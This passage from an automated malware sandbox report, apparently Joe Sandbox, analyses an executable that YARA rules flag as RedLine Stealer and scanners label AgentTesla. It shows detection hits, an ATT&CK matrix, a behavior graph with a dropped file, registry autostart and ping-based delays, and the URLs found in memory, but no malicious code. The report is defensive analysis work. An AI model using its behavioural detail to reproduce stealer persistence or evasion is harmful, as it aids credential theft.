                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                barindex
                Yara detected RedLine Stealer
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: atpRyiZGTE.exe PID: 3452, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: atpRyiZGTE.exe PID: 3452, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected RedLine Stealer
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: atpRyiZGTE.exe PID: 3452, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation1
                Registry Run Keys / Startup Folder                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping11
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Registry Run Keys / Startup Folder                		1
                Modify Registry                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Disable or Modify Tools                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
                Virtualization/Sandbox Evasion                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer3
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                Process Injection                		LSA Secrets11
                Remote System Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Hidden Files and Directories                		Cached Domain Credentials1
                System Network Configuration Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Obfuscated Files or Information                		DCSync12
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 652396 Sample: atpRyiZGTE.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 96 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 3 other signatures 2->50 7 atpRyiZGTE.exe 15 3 2->7         started        process3 dnsIp4 42 www.google.com 142.250.185.100, 443, 49746 GOOGLEUS United States 7->42 32 C:\Users\user\AppData\...\atpRyiZGTE.exe.log, ASCII 7->32 dropped 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->54 12 cmd.exe 1 7->12         started        15 cmd.exe 3 7->15         started        file5 signatures6 process7 file8 56 Uses ping.exe to sleep 12->56 58 Uses ping.exe to check the status of other devices and networks 12->58 18 reg.exe 1 1 12->18         started        21 PING.EXE 1 12->21         started        24 conhost.exe 12->24         started        34 C:\Users\user\...\LightKeeperService.exe, PE32 15->34 dropped 36 C:\...\LightKeeperService.exe:Zone.Identifier, ASCII 15->36 dropped 26 conhost.exe 15->26         started        28 PING.EXE 1 15->28         started        30 PING.EXE 15->30         started        signatures9 process10 dnsIp11 52 Creates an undocumented autostart registry key 18->52 38 127.0.0.1 unknown unknown 21->38 40 192.168.2.1 unknown unknown 21->40 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                atpRyiZGTE.exe42%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                atpRyiZGTE.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\LightKeeperService.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\LightKeeperService.exe42%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.ascendercorp.com/typedesigners.htmlG0%Avira URL Cloudsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.sakkal.comr0%URL Reputationsafe
                https://www.google.comT0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://ns.adp/1.0/0%Avira URL Cloudsafe
                http://www.fontbureau.como0%URL Reputationsafe
                https://www.google.com%BorderColorFocused0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.urwpp.deEv0%Avira URL Cloudsafe
                http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                http://ns.microsoto/1.20%Avira URL Cloudsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.de0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.google.com
                		142.250.185.100
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://www.google.com/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295467627.0000000006850000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295597676.0000000006845000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295438765.0000000006845000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.comatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.ascendercorp.com/typedesigners.htmlGatpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tiro.comatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.kratpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.comaatpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.comatpRyiZGTE.exe, atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/iatpRyiZGTE.exe, 00000000.00000003.295735340.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295655832.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295687027.0000000006846000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/cabarga.htmlNatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312675141.0000000006814000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sakkal.comratpRyiZGTE.exe, 00000000.00000003.299475642.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300737819.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300455988.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300935758.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300039387.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.301161307.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300667068.0000000006814000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.google.comTatpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlatpRyiZGTE.exe, 00000000.00000003.314251572.0000000006846000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ns.adp/1.0/atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comoatpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.google.com%BorderColorFocusedatpRyiZGTE.exe, LightKeeperService.exe.19.drfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.galapagosdesign.com/DPleaseatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deEvatpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.ascendercorp.com/typedesigners.htmlatpRyiZGTE.exe, 00000000.00000003.299802336.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.299334032.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300440687.0000000006859000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-user.html8atpRyiZGTE.exe, 00000000.00000003.312783150.0000000006855000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312649918.0000000006855000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ns.microsoto/1.2atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fonts.comatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.kratpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deatpRyiZGTE.exe, 00000000.00000003.309958195.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309784943.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310013124.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310158459.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309902011.0000000006814000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameatpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sakkal.comatpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

